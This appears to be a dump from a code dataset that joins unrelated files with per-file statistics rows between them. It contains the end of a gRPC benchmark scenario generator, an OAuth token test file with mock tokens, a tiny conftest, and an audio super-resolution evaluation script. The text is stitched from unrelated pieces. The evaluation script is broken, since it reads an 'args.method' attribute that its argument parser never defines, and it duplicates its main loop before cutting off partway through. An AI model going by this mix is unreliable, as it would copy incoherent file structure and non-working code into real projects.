'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'csharp_protobuf_sync_to_async_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'csharp_to_cpp_protobuf_sync_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++' # recognized by run_performance_tests.py
}
def __str__(self):
return 'csharp'
class NodeLanguage:
def __init__(self):
pass
self.safename = str(self)
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_node.sh']
def worker_port_offset(self):
return 200
def scenarios(self):
# TODO(jtattermusch): add more scenarios
secargs = SECURE_SECARGS
yield {
'name': 'node_protobuf_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
def __str__(self):
return 'node'
class PythonLanguage:
def __init__(self):
self.safename = 'python'
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_python.sh']
def worker_port_offset(self):
return 500
def scenarios(self):
yield {
'name': 'python_to_cpp_protobuf_streaming_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++'
}
yield {
'name': 'python_protobuf_sync_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
}
yield {
'name': 'python_protobuf_async_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
}
yield {
'name': 'python_to_cpp_single_channel_throughput',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': SECURE_SECARGS,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': BIG_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': SECURE_SECARGS,
'core_limit': SINGLE_MACHINE_CORES/2,
'async_server_threads': 1,
'payload_config': BIG_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS,
'SERVER_LANGUAGE': 'c++'
}
def __str__(self):
return 'python'
class RubyLanguage:
def __init__(self):
pass
self.safename = str(self)
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_ruby.sh']
def worker_port_offset(self):
return 300
def scenarios(self):
# TODO(jtattermusch): add more scenarios
secargs = SECURE_SECARGS
yield {
'name': 'ruby_protobuf_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
def __str__(self):
return 'ruby'
class JavaLanguage:
def __init__(self):
pass
self.safename = str(self)
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_java.sh']
def worker_port_offset(self):
return 400
def scenarios(self):
# TODO(jtattermusch): add more scenarios
for secure in [True, False]:
if secure:
secstr = 'secure'
secargs = SECURE_SECARGS
else:
secstr = 'insecure'
secargs = None
yield {
'name': 'java_protobuf_unary_ping_pong_%s' % secstr,
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 1,
},
'warmup_seconds': JAVA_WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
def __str__(self):
return 'java'
LANGUAGES = {
'c++' : CXXLanguage(),
'csharp' : CSharpLanguage(),
'node' : NodeLanguage(),
'ruby' : RubyLanguage(),
'java' : JavaLanguage(),
'python' : PythonLanguage(),
}
| 30.54717
| 76
| 0.569962
| 2,072
| 21,047
| 5.396236
| 0.127413
| 0.044182
| 0.074054
| 0.022538
| 0.819068
| 0.800912
| 0.790538
| 0.772024
| 0.767731
| 0.767731
| 0
| 0.012241
| 0.320758
| 21,047
| 688
| 77
| 30.59157
| 0.769866
| 0.092887
| 0
| 0.75208
| 0
| 0
| 0.37296
| 0.075999
| 0
| 0
| 0
| 0.001453
| 0
| 1
| 0.049917
| false
| 0.004992
| 0
| 0.02995
| 0.08985
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9b350fb2bdca85345bbcc310558f70d81324f724
| 6,278
|
py
|
Python
|
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
tests/test_ouath.py
|
gbozee/accounting-oauth
|
ab522a340a1fdb82cd5db72bdb019b41951bdb90
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from accounting_oauth import AccountingOauth, StorageInterface
@pytest.fixture
def q_client(quickbook_client):
return quickbook_client(StorageInterface())
@pytest.mark.asyncio
async def test_authorization(q_client: AccountingOauth, mock_request, mocker):
mock_httpx = mocker.patch("accounting_oauth.oauth.request_helper")
mock_httpx.return_value = mock_request(
{
"access_token": "eyJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q",
"expires_in": 3600,
"refresh_token": "Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O",
"token_type": "bearer",
"x_refresh_token_expires_in": 8721585,
}
)
authorization_response = {
"code": "the developer is here",
"state": q_client.state,
"realmId": "1234",
}
assert q_client.interface.access_token == None
await q_client.on_auth_response(**authorization_response)
assert_get_token(mock_httpx, authorization_response["code"])
assert (
q_client.interface.access_token
== "eyJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q"
)
assert (
q_client.interface.refresh_token
== "Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O"
)
def assert_get_token(mock_post, code):
mock_post.assert_called_with(
"https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer",
"POST",
data={
"grant_type": "authorization_code",
"redirect_uri": "http://testserver/quickbooks/auth-response",
"code": code,
},
headers={},
)
def assert_refresh_token(mock_post, refresh_token):
mock_post.assert_called_with(
"https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer",
"POST",
data={"grant_type": "refresh_token", "refresh_token": refresh_token},
headers={},
)
@pytest.mark.asyncio
async def test_refreshing_token_that_has_expired(
quickbook_client: AccountingOauth, mock_request, mocker
):
q_client = quickbook_client(
StorageInterface(
refresh_token="Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O",
access_token="eyJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q",
date_added=datetime.datetime(2019, 5, 10), # access token has expired
)
)
mock_httpx = mocker.patch("accounting_oauth.oauth.request_helper")
result_token = "eyJlbmMiOiTBMTI4Q0JDLUhTMjU2IiwiYWxnIjoiZGlyIn0..Jf3JsITu2P6GE4ufb6ElYA.0ZSTcoePtEMg5xHda7RjuMtPFIY93MsC-CU8fjK8kZJRBtYVgX1vCUpeK6IqI6f6QD3DMuzaHDSLWuH4gqXmEsYniYizLQ4eQJwFHyxhiF9jYC_SV7yPd4yUoG1DrhirU0Ujy_Dw02vkMXIJSOEAg4HUWg1CmNEKTvTWn4X5LutJeIt8A2FsSU-Dinlg32HUfftT87GMz7_2IE_do4gfqhQsH2aRIE26n7OPql153JJEgjH-FeCJ6_ZjWbD8T5ZAmDB9MO7xvvqQR8a6Vh9b3ukZ3CqbL7KaejxxiZGM6sGmimT9fhoeaIgVNX5S6x3oDIfZNKtmHiyswOsd_p5aj00tjbBdgQxgasp_Z7TTqzxg04RtS3jgtwIaaApbP3yp-UCTneUU0sL01znql8MUbNL4EXmegBEUtBD_El_C7wr7RAWpNLEwv9pw1hJT9fuXUyxA6P9fwL_I6HCnZDvrer6oCc7-POVQ8kXXE9eMQ1-70AA8-l6vRxj6Pj8xny2_lUWnvZJWxvInQ6aJQGT6tDHaAh60Ipd4P6b6UC2Qtyo6Ld4GQWYnRU4i_VEq32ciY7jYyyelDV-CnWdM2W6CcpTZg8lMVzM5QdoNMerySjzSsadk9q0gmseGCJkkgBi1kxNERam_xXN3urvg0w4HU0lria1nEk0kMlEMPD7XthvWQ4HXAXjT1aRa-YoLukkb.XNZBgw0xILTZylda_g4S3Q"
mock_httpx.return_value = mock_request(
{
"access_token": result_token,
"expires_in": 3600,
"refresh_token": "Q011532713322Pgork3wPLnNTwNOPXsYpvBU8rrkW4W8jNYa8O",
"token_type": "bearer",
"x_refresh_token_expires_in": 8721585,
}
)
assert q_client.interface.has_expired()
result, error = await q_client.refresh_token(q_client.interface.refresh_token)
# save token
await q_client.interface.save_token(**result)
assert_refresh_token(mock_httpx, q_client.interface.refresh_token)
assert result["access_token"] == result_token
assert not q_client.interface.has_expired()
| 68.23913
| 831
| 0.821121
| 417
| 6,278
| 11.983213
| 0.268585
| 0.036022
| 0.025615
| 0.122473
| 0.798879
| 0.756454
| 0.73384
| 0.73384
| 0.719232
| 0.698019
| 0
| 0.114778
| 0.121536
| 6,278
| 91
| 832
| 68.989011
| 0.791296
| 0.005575
| 0
| 0.3
| 0
| 0.05
| 0.638315
| 0.572776
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.0375
| false
| 0
| 0.0375
| 0.0125
| 0.0875
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9b6fc6b1e634c8154d3cd2a41c460ea323bb8b52
| 97
|
py
|
Python
|
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
vopri/battle-python
|
e01439562ccddee718b089fb5f171a2841c204a3
|
[
"MIT"
] | null | null | null |
from fixtures_board import *
from fixtures_move_decisions import *
from fixtures_snakes import *
| 24.25
| 37
| 0.845361
| 13
| 97
| 6
| 0.538462
| 0.461538
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 38
| 32.333333
| 0.917647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9ba843f984efef81ecf82bd67bea997ca207043e
| 20,945
|
py
|
Python
|
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
Evaluate.py
|
JamesKing76/AudioSuperResolution
|
85114887248c02b1c80f7162c909f6fe51d3667e
|
[
"MIT"
] | null | null | null |
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
import soundfile as sf
import torch
from matplotlib import cm
from matplotlib.colors import ListedColormap
from Processing.Filter import butter_lowpass_filter
from Models.AudioEDSR import AudioEDSR
from Models.AudioUNet import AudioUNet, AudioUNet_shuffle
from Training_Functions.Evaluation_Functions import LSD, SNR
from Training_Functions.Interpolation_NoML import spline_interpolation, linear_interpolation, flat_interpolation
# This file is used for evaluating the models
parser = argparse.ArgumentParser()
parser.add_argument("-M", "--model", default="UNET", type=str, help="EDSR|UNET|GAN")
parser.add_argument("-S", "--scale", default=2, type=str, help="The amount the model upsamples a signal by")
parser.add_argument("-P", "--modeldetail", default="", type=str, help="The postfix to the model in the file name. e.g."
" 4EDSRL2 would have modeldetail ' L2' ")
parser.add_argument("-L", "--linear", default=False, type=bool, help="load linear data? false for deep learning models")
parser.add_argument("--single", default=False, type=bool, help="Test on single file?")
parser.add_argument("-F", "--file", default="", type=str, help="The file for single file testing")
parser.add_argument("-D", "--dir", default="." + os.path.sep + "Data" + os.path.sep + "TEST", type=str,
help="The directory for for multi file testing")
args = parser.parse_args()
method = args.method
scale = args.scale
ext = args.modeldetail
Linear = args.linear
single = args.single
file = args.file
wave_dir = args.dir
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
viridisBig = cm.get_cmap('plasma')
newcmp = ListedColormap(viridisBig(np.linspace(-2, 1.2, 512)))
#
# newcmp = ListedColormap(viridisBig(np.linspace(0, 1, 512)))
if not Linear:
if method == "EDSR":
model = AudioEDSR(in_channels=1, out_channels=1, num_features=128, num_resblocks=32,
res_scale=0.1,
upscale_factor=scale, kernel_size=3).to(device)
elif method == "UNET" or method == "GAN":
model = AudioUNet(in_channels=1, out_channels=1, num_resblocks=4, upscale_factor=scale,
minfilterlength=9, maxfiltersize=512).to(device)
else:
model = AudioUNet_shuffle(in_channels=1, out_channels=1, num_resblocks=4, upscale_factor=scale,
minfilterlength=9, maxfiltersize=512).to(device)
model.load_state_dict(
torch.load(os.path.join("." + os.sep + "Data", str(scale) + method + ext + ".t7"),
map_location=torch.device('cpu')))
# wandb.watch(model)
print(model)
model.eval()
LSD_list = []
SNR_list = []
if single:
# file = '.\\Data\\Test\\p228_045_mic1.flac'
# file = "." + os.path.sep + "Data" + os.path.sep + "zeros.flac"
# The downsamples the file
inp = sf.read(file)[0]
inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
inp_filted_hr = inp_filted[::4]
inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
inp_filted_lr = torch.from_numpy( butter_lowpass_filter(
inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
# predicts interpolates /super resolves the signal
pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
if method == "EDSR":
pred_data = model(inp_filted_lr.detach().clone().
add(1).unsqueeze(0).unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
else:
pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
print(pred_data_spline.shape)
print(inp_filted_hr.shape)
# inp_filted_lr = inp_filted_lr.sub(1)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "SPLINE.flac"), pred_data_spline, 12000)
fig = plt.figure(figsize=(30, 5))
subplot = fig.add_subplot(scale, 5, 1)
plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
subplot = fig.add_subplot(1, 5, 2)
plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * 2)
subplot = fig.add_subplot(1, 5, 3)
plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * 2)
subplot = fig.add_subplot(1, 5, 4)
plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * 2)
subplot = fig.add_subplot(1, 5, 5)
plt.colorbar(label="ok", orientation="vertical")
plt.show()
print("Discrepancy with testing results")
print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
# print(max(pred_data), "<->", min(pred_data))
# print(max(inp_filted_hr), "<->", min(inp_filted_hr))
# print(max(inp_filted_lr), "<->", min(inp_filted_lr))
# print(max(pred_data_spline), "<->", min(pred_data_spline))
else:
# file = '.\\Data\\Test\\p228_045_mic1.flac'
# wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
data = []
for file in files:
inp = sf.read(file)[0]
inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
inp_filted_hr = inp_filted[::4]
inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
print(len(inp))
print(len(inp_filted))
inp_filted_lr = torch.from_numpy(
butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
if method == "EDSR":
pred_data = model(inp_filted_lr.detach().clone().add(1).
unsqueeze(0).unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
else:
pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
print(pred_data_spline.shape)
print(inp_filted_hr.shape)
# inp_filted_lr = inp_filted_lr.sub(1)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
sf.write(os.path.join(
'.' + os.sep + 'Data',
'Predict ' + 'Scale ' + str(scale) + "Spline.flac"), pred_data_spline, 12000)
fig = plt.figure(figsize=(30, 5))
subplot = fig.add_subplot(scale, 5, 1)
plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
subplot = fig.add_subplot(1, 5, 2)
plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 3)
plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 4)
plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * scale)
subplot = fig.add_subplot(1, 5, 5)
plt.colorbar(label="ok", orientation="vertical")
plt.show()
# LSD_list.append(LSD(pred_data, inp_filted_hr))
# SNR_list.append(SNR(pred_data, inp_filted_hr))
LSD_list.append(LSD(pred_data, inp_filted_hr))
SNR_list.append(SNR(pred_data, inp_filted_hr))
print("Discrepancy with testing results")
print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
# print(max(pred_data), "<->", min(pred_data))
# print(max(inp_filted_hr), "<->", min(inp_filted_hr))
# print(max(inp_filted_lr), "<->", min(inp_filted_lr))
# print(max(pred_data_spline), "<->", min(pred_data_spline))
print("meanLSD: ", np.mean(LSD_list))
print("varLSD: ", np.var(LSD_list))
print("meanSNR: ", np.mean(SNR_list))
print("varSNR: ", np.var(SNR_list))
# file = '.\\Data\\Test\\p228_045_mic1.flac'
# wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
data = []
for file in files:
inp = sf.read(file)[0]
inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
inp_filted_hr = inp_filted[::4]
inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
print(len(inp))
print(len(inp_filted))
inp_filted_lr = torch.from_numpy(
butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
if method == "EDSR":
pred_data = \
model(inp_filted_lr.detach().clone().add(1).unsqueeze(0).unsqueeze(0)).sub(
1).cpu().detach().numpy()[0][
0]
else:
pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
print(pred_data_spline.shape)
print(inp_filted_hr.shape)
